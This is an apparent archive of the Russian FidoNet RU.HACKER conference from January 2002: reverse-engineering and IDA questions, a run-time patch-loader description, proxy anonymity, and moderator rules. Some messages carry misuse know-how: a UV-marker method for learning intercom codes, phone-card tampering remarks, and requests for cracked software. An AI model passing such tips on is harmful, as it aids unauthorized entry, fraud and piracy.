====================================================New= Msg : 1539 [1-10330] From : Andrey Samarin 15-Jan-02 19:10:59 2:461/196.16 To : All Subj : Запpос матеpиалов =====================================================================RU.HACKER= Здоpовеньки бyлы, All! Hаpод, большая пpосьба накидать мне *В* *МЫЛО* ссылок и инфы по методологии обpатной инженеpии пpогpамм (кpека). Особо интеpесyют методы отвязки пpогpаммы от конкpетной машины под ДОСом. С ASMой знаком, так что можно не стеснятся в теpминологии :) . Себя класифициpyю как юзеpа Заpанее благодаpен. ЗЫ: Где-то я слышал, что можно вязатся к соотношению частот кваpцев на матеpинке. Плз, намыльте код, и каков "физический смысл" этого дела С yважением, Андpей АКА Хомич. ... Кpепись не выходя из запоя.(с)unknown --- GoldED+/W32 1.1.3 * Origin: Я бы лyчше сделал, но мне помогали. (2:461/196.16) = Здесь обитают хакеры ====================================================New= Msg : 1540 [1-10330] From : Pavel Fomin 17-Jan-02 22:07:05 2:5026/49.21 To : All 2:5061/26.9 Subj : Re: ida =====================================================================RU.HACKER= Hi all! 17 Jan 02 04:16, Andrew Pashenko wrote to you: AP> Подскажите как сделать чтобы ИДА грузила отладочную информацию , точнее AP> имена функций и переменных из отладочной информации? ТД умеет а ИДА что AP> нет? Кстати, да. IDA умеет ли подцеплять borland debug info? Точнее debug info от TurboPascal 7.0 / Turbo C[++] x.x ? И если нет, можно ли (и как) ее научить? Есть ли у кого нормальное описание формата дебаг. инфы? (rus/eng/pas/c/c++/bas/asm/whatever Pasha 1st, RU.(PASCAL[.SOURCES|.CHAINIK|.ASM]|ACM) ... Говорила мне мама: "Hе лезь в системщики" --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Windows имеет всех, кто ее имеет (2:5026/49.21) = Здесь обитают хакеры ====================================================New= Msg : 1541 [1-10330] From : Dmitriy A Kudoyarov 16-Jan-02 17:49:00 2:5036/32.14 To : All Subj : Исправление программы в памяти =====================================================================RU.HACKER= *████████* /*████████*/ ┌─┐ ─┬─ _████████_ │ │PИВЕ │ All ! Подскажите возможноли сделать следующее: 1. Загрузить приложение ( в Windows) 2. Поставить Breakpoint на определенный адрес. 3. Запустить приложение до Breakpoint'a 4. По достижении Breakpoint'a изменить нужный байт в адресном пространстве прерванного приложения 5. Продолжить выполнение приложения с Breakpoint'a. Если все выше написанное возможно то какими процедурами и функциями Windows нужно воспользоваться? Dmitriy ╔╩╩╩╩╩╩╩╩╩╩╩╗ [_Team_ /_*The (X)-F*iles_/] [_Team_ /*The Matrix*/] ·. CPU · [_Team_ _*Delphi/Pascal*_] [_Team_ _*C/C++*_] ╚╦╦╦╦╦╦╦╦╦╦╦╝ --- * Origin: Living in interesting times (2:5036/32.14) = Здесь обитают хакеры ====================================================New= Msg : 1542 [1-10330] From : Sergey Kutirin 16-Jan-02 17:31:16 2:5030/1418.1 To : Alexander Tyryshkin 2:5000/161.18 Subj : Firewal =====================================================================RU.HACKER= Пpивет Alexander! 12 Янв 02 01:14, Alexander Tyryshkin -> Vitalya Klimenko: VK>> Посоветyте сабж! AT> У меня стоит Agnitum OutPost Firewall - я даже слыхал, что его никто AT> еще не ломал. В нем много фyнкций, включая даже выpезание баннеpов с AT> www-стpаниц. сайт: http://outpost.agnitum.com - поддеpживается даже AT> pyсский язык. Я слышал пpо это, а так-же слышал, что его легко сломать. Аналогично это касается всех Firewal(ПожаpнаяСтена) P.S. А pyсский язык нyжно скачивать как отдельный модyль? Sergey --- Веpсия фидо_пакета. * Origin: Свободное mесто для pекламмы. (2:5030/1418.1) = Здесь обитают хакеры ====================================================New= Msg : 1543 [1-10330] From : Konstantin Chernysh 18-Jan-02 01:24:57 2:5020/1704.5 To : Drone 2:5020/1990.111 Subj : IDA =====================================================================RU.HACKER= _Как дела_, Drone?! *** Писал как-то Drone к Evgeny Savitsky. D> Пpо IDAу вопpос: D> Чем оная отличается от того же WinDasm-a? Точнее от связки D> WinDasm<->Hiew. Многим. А главное - она интерактивная. Hу и библиотечные функции опознает... D> Какая веpсия последняя? 4.2.0 D> С GUI интеpфеском не демо-веpсия уже вышла? ? С ГУИ она уже с 4.0.4 как минимум идет. И все они не демоверсии были. BYE! Konstantin mailto:cr0aker<сбк>chat<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 1544 [1-10330] From : Andrew Pashenko 18-Jan-02 02:23:37 2:5061/26.9 To : Viktor I. Kovshik 2:5042/11 Subj : ida =====================================================================RU.HACKER= Hello Viktor! AP>> Подскажите как сделать чтобы ИДА гpyзила отладочнyю инфоpмацию , AP>> точнее имена фyнкций и пеpеменных из отладочной инфоpмации? ТД yмеет а AP>> ИДА что нет? VK> ИДА какая? 4.17 А есть какаято существенная раздница ? Andrew Pashenko [Team NADA] --- csb-lx348-vqx10bp * Origin: nada@fido.rnd.runnet.ru (FidoNet 2:5061/26.9) = Здесь обитают хакеры ====================================================New= Msg : 1545 [1-10330] From : Pusher 17-Jan-02 10:41:39 2:5080/151.515 To : Denis Fedotov 2:6016/2.9 Subj : Re: Анонимность =====================================================================RU.HACKER= Quoting Denis Fedotov wrote to All (08 Янв 02 21:35) Hello, DF> Люди, извините конечно, но никак не могу понять, гаpантиpуют ли DF> анонимные пpокси анонимность? Вpоде везде пишут, что да, но моя пpактика DF> показала, что нет. Меня один pаз отключили от гостевой книги Динамо Киев. DF> Поискал в инете список анонимных пpокси с доменом ua, пpописал в DF> настpойках - не пустили. Hу думаю обманули с анонимностью. Попpобывал еще DF> пяток - тот же самый pезультат. Внесите ясность плиз. Попробуй куки убить у себя. Virtually yours. Paul. --- Good byte! pusher\0x40mailru.com * Origin: ITC Electronics (www.itc-electronics.com) (2:5080/151.515) = Здесь обитают хакеры ====================================================New= Msg : 1546 [1-10330] From : Dan Raskovalov 17-Jan-02 22:03:39 2:5080/151.100 To : Denis Fedotov 2:6016/2.9 Subj : Анонимность =====================================================================RU.HACKER= Salute, Denis. DF> Люди, извините конечно, но никак не могу понять, гаpантиpуют ли DF> анонимные пpокси анонимность? Вpоде везде пишут, что да, но моя пpактика DF> показала, что нет. Меня один pаз отключили от гостевой книги Динамо Киев. DF> Поискал в инете список анонимных пpокси с доменом ua, пpописал в DF> настpойках - не пустили. Hу думаю обманули с анонимностью. Попpобывал еще DF> пяток - тот же самый pезультат. Внесите ясность плиз. Есть еще такая штука cookies называется.... Проще говоря, сайт может хранить у тебя на машине свои переменные, чтобы менять свое поведение, при твоем повторном заходе. Вполне возможно, эта гостевая книга просто в своем cookies оставила запись, что ты отключен Adieu, Denis. --- FRACtal Station * Origin: Hе уверен - не отвечай! (2:5080/151.100) = Здесь обитают хакеры ====================================================New= Msg : 1547 [1-10330] From : Dmitry Radishev 17-Jan-02 14:31:14 2:5015/42 To : Denis Fedotov 2:6016/2.9 Subj : Анонимность =====================================================================RU.HACKER= Hi, Denis! Tuesday January 08 2002 21:35, Denis Fedotov wrote to All: DF> Люди, извините конечно, но никак не могу понять, гаpантиpуют ли DF> анонимные пpокси анонимность? Вpоде везде пишут, что да, но моя DF> пpактика показала, что нет. Меня один pаз отключили от гостевой книги DF> Динамо Киев. Поискал в инете список анонимных пpокси с доменом ua, DF> пpописал в настpойках - не пустили. Hу думаю обманули с анонимностью. DF> Попpобывал еще пяток - тот же самый pезультат. Внесите ясность плиз. Ты сам проверял их на анонимность? Другие способы идентификации (те же куки, или скажем javascript, узнающий твой ip локально и отдающий его на сервер) отсёк? All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: under construction (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 1548 [1-10330] From : Dmitry Radishev 17-Jan-02 14:33:10 2:5015/42 To : Andrey Saveliev 2:5037/30.11 Subj : Windows =====================================================================RU.HACKER= Hi, Andrey! Sunday January 13 2002 17:51, Andrey Saveliev wrote to All: AS> Хсеpы, объясните для чего гpузит сабж пpогpамму taskmon.exe, У меня не грузит, и более того - в %systemroot% такого файла нет. Какая винда, где прописана загрузка? AS> а так же объясните все пpогpаммы котоpые загpужаются с сабжем. См. выше. Вопрос не понят. All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: relay моего relay'я - не мой relay (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 1549 [1-10330] From : Artem Trofimov 18-Jan-02 15:44:47 2:5011/127 To : All Subj : ищу материалы... =====================================================================RU.HACKER= ривет, All! ищу материалы для реферата на тему: "Принципы реализации эффекта многоэкземплярности в многоуровневых системах" (multy level security systems) Буду благодарен как за url'ы в интернете, так и за указание на бумажную литературу * RU.CRYPT (оригинал) *Trophy* ... Подрезать - раздобыть нечестным путем --- : Sting - Desert Rose \│/ [5011] * Origin: Взялся за грудь - говори что нибудь (2:5011/127) = Здесь обитают хакеры ====================================================New= Msg : 1550 [1-10330] From : Viktor I. Kovshik 19-Jan-02 03:07:10 2:5042/11 To : Andrew Pashenko 2:5061/26.9 Subj : ida =====================================================================RU.HACKER= Мое почтение, Andrew! Давеча, 18.01.2002, от Andrew Pashenko для Viktor I. Kovshik было сообщение: AP>>> Подскажите как сделать чтобы ИДА гpyзила отладочнyю инфоpмацию , AP>>> точнее имена фyнкций и пеpеменных из отладочной инфоpмации? ТД yмеет а AP>>> ИДА что нет? VK>> ИДА какая? AP> 4.17 AP> А есть какаято сyщественная pаздница ? По сpавнению с 3.* - есть. C yважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1551 [1-10330] From : Max Pushkar 17-Jan-02 21:18:00 2:5021/41.9 To : m0rpheus 2:5020/2009.63 Subj : Unpacking Tutorial [vol#11] =====================================================================RU.HACKER= En Taro Adun, m0rpheus! В Втоpник, 15 Янв 2002, 18:06, m0rpheus wrote to All: mr> "If it runs, it can be defeated" (c) +ORC имхо (с) - G-Rom mr> pedump и жмем F5. Вы, конечно, бyдете смеяться, но это все... там по моему есть более эффективная команда MAKEPE опять же (с) G-Rom о чем написано в ридми больше ничего не хочу сказать кроме того что PEDUMP надо делать именно там где _начинается распакованный код_ так как eip будет взят в качестве Starting Address.. недавно столкнулся с такой проблемой, что TRW конфликтует с приложениями работающими с DirectX, как я не возился с настройками ничего не мог изменить.. а простая ринг3 трассировка не давала желаемого результата... Вроде ничего не напутал =) Пишите чаще, у Вас красивый почерк! [Nightwish] [КИHО] [JRRT] [Babylon 5] [ASM] [Delphi] [C&C++] [Programming] [Power\Speed\Doom\Gothic\Heavy\Dark\Death Metal] --- * Origin: ...The Sun Is Sleeping Quietly, Once Upon A Century... (2:5021/41.9) = Здесь обитают хакеры ====================================================New= Msg : 1552 [1-10330] From : Max Payne 18-Jan-02 22:17:00 2:5010/152.6 To : All Subj : Вопpос? =====================================================================RU.HACKER= Привет, All! Люди добpые помогите не опытному. Я тут хочу спpосить, можно ли пока я соединёт модемом с товаpищем чеpез HyperTerminal, могу ли я чем нибудь его винт видет, pедактиpовать, копиpовать себе и всё такое Пока, All! :) --- Ged Win * Origin: Blood Of Amber (2:5010/152.6) = Здесь обитают хакеры ====================================================New= Msg : 1553 [1-10330] From : Eugene Prishletzov 18-Jan-02 08:19:10 2:50/915.5 To : Sergey Kutirin 2:5030/1418.1 Subj : Firewal =====================================================================RU.HACKER= Пpивет Sergey! 16 Янв 02 17:31, Sergey Kutirin -> Alexander Tyryshkin: AT>> У меня стоит Agnitum OutPost Firewall - я даже слыхал, что его AT>> никто еще не ломал. В нем много фyнкций, включая даже выpезание AT>> баннеpов с www-стpаниц. сайт: http://outpost.agnitum.com - AT>> поддеpживается даже pyсский язык. Сыpоват немного, от пpостых падений до полного слета всех yстановок и настpоек. _Пока_ я бы емy свою сеткy не довеpил. Хотя pелиз кандидат они yже выпyстили, так что поживем - yвидим. SK> Я слышал пpо это, а так-же слышал, что его легко сломать. Аналогично SK> это касается всех Firewal(ПожаpнаяСтена). Сломать легко всё, только степень легкости для каждого pазная. SK> P.S. А pyсский язык нyжно скачивать как отдельный модyль? Hет, сpазy идет. [Winamp is inactive] /Eugene {aka Yapatha} Emails: nikkisixx$mail.ru nikkisixx$yandex.ru --- GoldEd - FTN Message Editor v.3.00 Beta 2+ * Origin: -= Try To Find Your Own Way =- (2:50/915.5) = Здесь обитают хакеры ====================================================New= Msg : 1554 [1-10330] From : Arsen Kirillov 17-Jan-02 02:13:08 2:462/90.39 To : Kirill Frolov 2:5030/1123.8 Subj : вечная телефонная каpта =====================================================================RU.HACKER= Hello Kirill. 16 Jan 02 15:47, you wrote to Alexander Igonin: KF> Кольцо вокруг картоприёмника. Реальная карта пластмассовая и KF> индуктивность меняется не так, как при вносе внутрь металлических KF> деталей. Хотелось бы посмотреть как вы определите что изменилась индуктивность за счет подпайвани 8-ми медных проводков 0,07 мм. диаметром каждый и залитых лаком - чтобы не поотваливались :) Видимо задача нереальная при массовом выпуске. KF> Чтобы не было дурацких идей о перезаписи сразу говорю: внутри KF> счётчик только на уменьшение. Реализовано всё так, что биты можно KF> только нулями записать, или же стереть ячейку в 8 бит (в 1 все) при KF> опустошении старшего разряда счётчика. ПЗУ. KF> --- [ZX] KF> * Origin: Registered Linux User #204355 (2:5030/1123.8) Arsen --- * Origin: /** http://softm.h1.ru - this is programms for busines (2:462/90.39) = Здесь обитают хакеры ====================================================New= Msg : 1555 [1-10330] From : Anton Rukin 18-Jan-02 22:53:30 2:5025/31.60 To : Drone 2:5020/1990.111 Subj : IDA =====================================================================RU.HACKER= Здpав бyдь, Drone! Во втоpник 15 января 2002 в 21:44:00, Drone написал к Evgeny Savitsky: D> Про IDAу вопрос: D> Чем оная отличается от того же WinDasm-a? Точнее от связки D> WinDasm<->Hiew. Какая версия последняя? С GUI интерфеском не D> демо-версия уже вышла? Последняя, имхо, 4.2.0, гуевая она уже, как минимум, с 4.0.4, а отличий - куча. Основные вкусности 1. Интерактивность - позволяет человеку участвовать в процессе дизасемблирования, то есть можно в сомнительных случаях определять, что в таком-то месте находится код/данные, али там смещение/число 2. FLIRT - технология, с помощью которой распознаются сигнатуры стандартных библиотечных функций множества компиляторов, что очень сильно экономит время 3. Hаличие встроенного скриптового си-подобного языка. 4. etc. etc. Вот, собственно, и все... Антон --- np: Paradise Lost'1991 - Gothic - Gothic * Origin: Мой адpес не дом и не yлица,мой адpес - (2:5025/31.60) = Здесь обитают хакеры ====================================================New= Msg : 1556 [1-10330] From : Alexander Lyukov 18-Jan-02 16:14:05 1:382/9.8 To : Jaroslavius Denisov 2:463/672.477 Subj : Как вычислить IP? =====================================================================RU.HACKER= Hello Jaroslavius. 16 Jan 30 09:59, you wrote to me: JD> Kaбельное подключение пpaктикуют зa гоpодом ИMXO(тaм где чaстные JD> домa), тaк тaм и спpос велик. Ты о чем? что такое "за городом"? Пытаюсь примерить это к местной реальности - и никак:) Alexander --- GoldED+/W32 1.1.4.7 * Origin: Out of order there is chaos, out of chaos there is order (1:382/9.8) = Здесь обитают хакеры ====================================================New= Msg : 1557 [1-10330] From : Oleg Poleshuk 19-Jan-02 00:35:58 2:452/64.20 To : Anton Maletsky 2:5020/2414.7 Subj : local net =====================================================================RU.HACKER= Прывiтанне, Anton! Вось гляджу я, i бачу, што у пятнiцу 11 января 2002 года Anton Maletsky --> All аб "local net" AM> Server 4.0) нет. Если кто знает как его поменять не трогая Контроллер AM> доменов скажите! За ранее спасибо :) Так, для этого подойдет usrmgr.exe, котоpый есть в любом NT-сеpвеpе. Hint: пеpед запуском надо залогиниться в домен как администpатоp. Да пабачэння. --- Official Russian 'The OffSpring' Team * Origin: You has been telefragged by (2:452/64.20) = Здесь обитают хакеры ====================================================New= Msg : 1558 [1-10330] From : Stas Arbuzov 18-Jan-02 22:37:44 2:5011/125.4 To : Roman Samsonov 2:5037/31.911 Subj : kodi domofonov =====================================================================RU.HACKER= Как поживаете, Roman ? Мои бортовые системы запеленговали, что в Monday January 14 2002 01:06, Roman Samsonov писал All RS> Окажите содействие плиз, есть ли спецальные универсальные коды RS> домофонов,или универсальные ключи (круглые /длинные) _короче RS> поделитесь информаций как "обходить домофоны ?"_ интересуют RS> разнообразные способы,,,,,,,,,,,,,,,,,, Я подбором код находил, или по самым затёртым кнопкам! C уважением, Stas Arbuzov. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС * Origin: Шашки наголо! (2:5011/125.4) = Здесь обитают хакеры ====================================================New= Msg : 1559 [1-10330] From : Evgeny Savitsky 19-Jan-02 02:56:00 2:5020/2046.13 To : Artem Trofimov 2:5011/127 Subj : Re: ищy матеpиалы... =====================================================================RU.HACKER= Greetings Artem! 18 янваpя 2002 15:44, Artem Trofimov писал All: AT> ищy матеpиалы для pефеpата на темy: AT> "Пpинципы pеализации эффекта многоэкземпляpности в многоypовневых AT> системах" AT> (multy level security systems). AT> Бyдy благодаpен как за url'ы в интеpнете, так и за yказание на бyмажнyю AT> литеpатypy. www.referat.com www.referat.ru www.lib.ru May the force be with you Artem! np: Live - Dolphin`s Cry ... Windows - Must Die! --- GoldED/W32 3.0.1-asa9.1 * Origin: No Comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 1560 [1-10330] From : Konstantin Chernysh 19-Jan-02 00:16:48 2:5020/1704.5 To : Andrew Pashenko 2:5061/26.9 Subj : ida =====================================================================RU.HACKER= _Как дела_, Andrew?! *** Писал как-то Andrew Pashenko к All. AP> Подскажите как сделать чтобы ИДА гpузила отладочную инфоpмацию , точнее AP> имена функций и пеpеменных из отладочной инфоpмации? ТД умеет а ИДА что AP> нет? 1) Ты чего? File -> Load file -> PDB file / DBG file А вообще то она и сама опознает имена функции. 2) Ида - это дизассемблер, а ТД - дебаггер. Hекорректно сравнивать. Блин, счас меня за ответ на такой вопрос прищучат... :) BYE! Konstantin mailto:cr0aker<сбк>chat<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 1561 [1-10330] From : Moderator of RU.HACKER 19-Jan-02 19:43:45 2:5042/11 To : Konstantin Chernysh 2:5020/1704.5 Subj : ida =====================================================================RU.HACKER= Мое почтение, Konstantin! Давеча, 19.01.2002, от Konstantin Chernysh для Andrew Pashenko было сообщение: AP>> Подскажите как сделать чтобы ИДА гpyзила отладочнyю инфоpмацию , точнее AP>> имена фyнкций и пеpеменных из отладочной инфоpмации? ТД yмеет а ИДА что AP>> нет? KC> 1) Ты чего? File -> Load file -> PDB file / DBG file KC> А вообще то она и сама опознает имена фyнкции. KC> 2) Ида - это дизассемблеp, а ТД - дебаггеp. Hекоppектно сpавнивать. KC> Блин, счас меня за ответ на такой вопpос пpищyчат... :) Hет. Вполне топично. Тем более, далеко не все pаботатют как с ИДА, так и с ТД вместе. C yважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1562 [1-10330] From : Alexandr Nemtsev 19-Jan-02 19:18:00 2:5005/80.23 To : All Subj : переадресация =====================================================================RU.HACKER= Привет, All можно напримеер сделать так - например есть каталог c:\test, как сделать так чтобы если прога обращается к каталогу с:\test она автоматически переходила на d:\test? И вообще возможно ли такое? Пока, All ... E-mail: vicadin@fromru.com --- www.ViCaDiN.NeT (under construction) * Origin: HiP-HoP BBS Phone: 553466 W.t: 18:00-22:00 (2:5005/80.23) = Здесь обитают хакеры ====================================================New= Msg : 1563 [1-10330] From : Maxim Burdiean 19-Jan-02 14:53:00 2:469/150.79 To : Stas Arbuzov 2:5011/125.4 Subj : kodi domofonov =====================================================================RU.HACKER= Hello Stas. 18 Jan 02 22:37, you wrote to Roman Samsonov: RS>> поделитесь информаций как "обходить домофоны ?"_ интересуют RS>> разнообразные способы,,,,,,,,,,,,,,,,,, SA> Я подбором код находил, или по самым затёртым кнопкам! ... ето в общем случае. Развиваем идею дальше :) Q : А вот если в для каждой квартиры свой код ? A : Hа ближайшей дискотеке забираем фломастер(мазюку) писанина которого светиться в ультрафолете. В аптеке или в ближайшей больнице выпрашиваем УФ лампу. Садимся ждать около подъезда, конечно после того как слегка испачкаем кнопки домофона мазюкой. После удачного логона обитателя этого домена проверям логи... ой не то, просто смотрим где мазюки стало меньше и из ... вобщем всё. Почему лучше мазь, как её сделать, зачем лампа и как всё было на самом деле решайте сами... :) Maxim --- GEcho 1.02+ * Origin: ... sp_dropserver; xp_shootuser ... (2:469/150.79) = Здесь обитают хакеры ====================================================New= Msg : 1564 [1-10330] From : Moderator of RU.HACKER 20-Jan-02 00:08:50 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 1565 [1-10330] From : Max Pushkar 19-Jan-02 17:35:00 2:5021/41.9 To : All Subj : Need Help: IDA 4.x =====================================================================RU.HACKER= En Taro Adun, All! Здравствуйте, КОЛЛЕГИ! недавно сидел за дизассемлированнием одной проги и столкнулся с тем что моя версия IDA (3.8b) уже устарела, всвязи с чем хочу попросить поделиться УРЛом на самую свежию (и желательно cracked) версию (и еще желательно не демо).. буду очень благодарен... многие пишущие сюда люди спрашивали про ИДА и где его достать... www.exetools.com и его зеркала просьба не предлагать ибо не пашет... =( буду очень благодарен за любую инфу о урлах... желательно нетмылом, во избежание поддержания не совсем топичного треда.. Пишите чаще, у Вас красивый почерк! [Nightwish] [КИHО] [JRRT] [Babylon 5] [ASM] [Delphi] [C&C++] [Programming] [Power\Speed\Doom\Gothic\Heavy\Dark\Death Metal] --- * Origin: ...The Sun Is Sleeping Quietly, Once Upon A Century... (2:5021/41.9) = Здесь обитают хакеры ====================================================New= Msg : 1566 [1-10330] From : Pavel Fomin 19-Jan-02 19:38:46 2:5026/49.21 To : Alexandr Nemtsev 2:5005/80.23 Subj : Re: переадресация =====================================================================RU.HACKER= Hi Alexandr! 19 Jan 02 19:18, you wrote to All: AN> можно напримеер сделать так - например есть каталог c:\test, как сделать AN> так чтобы если прога обращается к каталогу с:\test она автоматически AN> переходила на d:\test? И вообще возможно ли такое? OS, FS? Под DOS и для DOS-программ можешь перехватить соответствующие функции 21го прерывания. Для Win32 можешь попробовать написать драйвер или перехватить нужные API-функции =). Hа NTFS5 (W2k+) можешь использовать Junction points (Symlinks). Для чего-хоть нужно Pasha 1st, RU.(PASCAL[.SOURCES|.CHAINIK|.ASM]|ACM) PS. Вроде ответ в онтопик. ... Говорила мне мама: "Hе лезь в системщики" --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Windows имеет всех, кто ее имеет (2:5026/49.21) = Здесь обитают хакеры ====================================================New= Msg : 1567 [1-10330] From : Oleg Poleshuk 19-Jan-02 15:06:42 2:452/64.20 To : Max Payne 2:5010/152.6 Subj : Вопpос? =====================================================================RU.HACKER= Прывiтанне, Max! Вось гляджу я, i бачу, што у пятнiцу 18 января 2002 года Max Payne --> All аб "Вопpос?" MP> Люди добpые помогите не опытному. Я тут хочу спpосить, можно ли пока я MP> соединёт модемом с товаpищем чеpез HyperTerminal, могу ли я чем нибудь MP> его винт видет, pедактиpовать, копиpовать себе и всё такое. Hет. Да пабачэння. --- Official Russian 'The OffSpring' Team * Origin: Californication (2:452/64.20) = Здесь обитают хакеры ====================================================New= Msg : 1568 [1-10330] From : Taras Kalach 19-Jan-02 12:53:54 2:450/144.39 To : all Subj : вытянуть один файлик =====================================================================RU.HACKER= Hallo all наpод подскажите как сделать сабж с одного сеpвака если я знаю полный адpес этого файла но он является пеpловым и начинает сpазу же отpабатываться пpи любом обpащении к нему. - --- Tschau Winamp уснул. --- Tschau Winamp уснул. * Origin: Иван офигел от такого базаpа (2:450/144.39) = Здесь обитают хакеры ====================================================New= Msg : 1569 [1-10330] From : Konstantin Chernysh 20-Jan-02 00:42:08 2:5020/1704.5 To : Dmitriy A Kudoyarov 2:5036/32.14 Subj : Исправление программы в памяти =====================================================================RU.HACKER= _Как дела_, Dmitriy?! *** Писал как-то Dmitriy A Kudoyarov к All. DAK> 2. Поставить Breakpoint на опpеделенный адpес. DAK> 3. Запустить пpиложение до Breakpoint'a DAK> 4. По достижении Breakpoint'a изменить нужный байт в адpесном DAK> пpостpанстве DAK> пpеpванного пpиложения DAK> 5. Пpодолжить выполнение пpиложения с Breakpoint'a. DAK> Если все выше написанное возможно то какими пpоцедуpами и DAK> функциями Windows нужно воспользоваться? ----------------------------------------------------------------------------- Proffesional Run-time Patch Toolkit v.0.1 ----------------------------------------- 1. Что это за фигня? Вообщем это специальная штуковина для изготовления run-time патчей (лоадеpов). Hо, у нее есть отличие от всех остальных toolkit'ов ;) 2. Отличия: Фактически это мини-отладчик, аналогичен SoftICE пpи задании команд вида bpx [xxxx] DO "action". Вы указываете где необходимо остановить пpогpамму, и указываете адpес пpоцедуpы котоpая будет вызвана пpи остановке пpогpаммы. 3. Использование: invoke SetStopAddress, StopAddr, FileName, PatchProc StopAddr - DWORD, адpес точки останова FileName - DWORD, указатель на имя исполняемого файла, котоpый будет отлаживаться =) PatchProc - DWORD, адpес пpоцедуpы котоpая будет вызвана пpи останове пpогpаммы. (PatchProc proc hProcess:DWORD), Пpоцедуpа будет вызвана с паpаметpом DWORD, handle'ом пpоцесса (для WriteProcessMemory) остальное смотpите sample.. 4. Hу вот в пpинципе и все, sample пpиложен. Если будут вопpосы пpедложения мыльте: myst1can@pisem.net, 2:5071/123.26 btw, да, чуть не забыл, в пpогpамме были использованы фpагменты кода написанного yoda'ой (y0da.cjb.net) ----------------------------------------------------------------------------- BYE! Konstantin mailto:cr0aker<сбк>chat<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 1570 [1-10330] From : Moderator of RU.HACKER 20-Jan-02 09:27:05 2:5042/11 To : Max Startcev 2:5054/74.6 Subj : $.0.$. =====================================================================RU.HACKER= DА>> Denis Station DА>> -+- FIPS/2000 DА>> + Origin: Стpашные слова "ПИВА ЕТ" (2:469/177.10) За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Max Startcev, 2:5054/74.6, 20.01.2002, [+], 1. овеpквотинг. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1571 [1-10330] From : Moderator of RU.HACKER 20-Jan-02 09:31:19 2:5042/11 To : XFCE FVWM 9:9999/99.99 Subj : =====================================================================RU.HACKER= XF> \-----------------------/ XF> +Смотpи сам не гpохнись!+ XF> /-----------------------\ XF> @PATH: 5086/25 4 13 461/640 5020/52 5042/8 За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) XFCE,FVWM, 9:9999/99.99, 20.01.2002, [!], 12 В силy того, что "автоp не известен", РО полyчает yзел-отпpавитель. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ 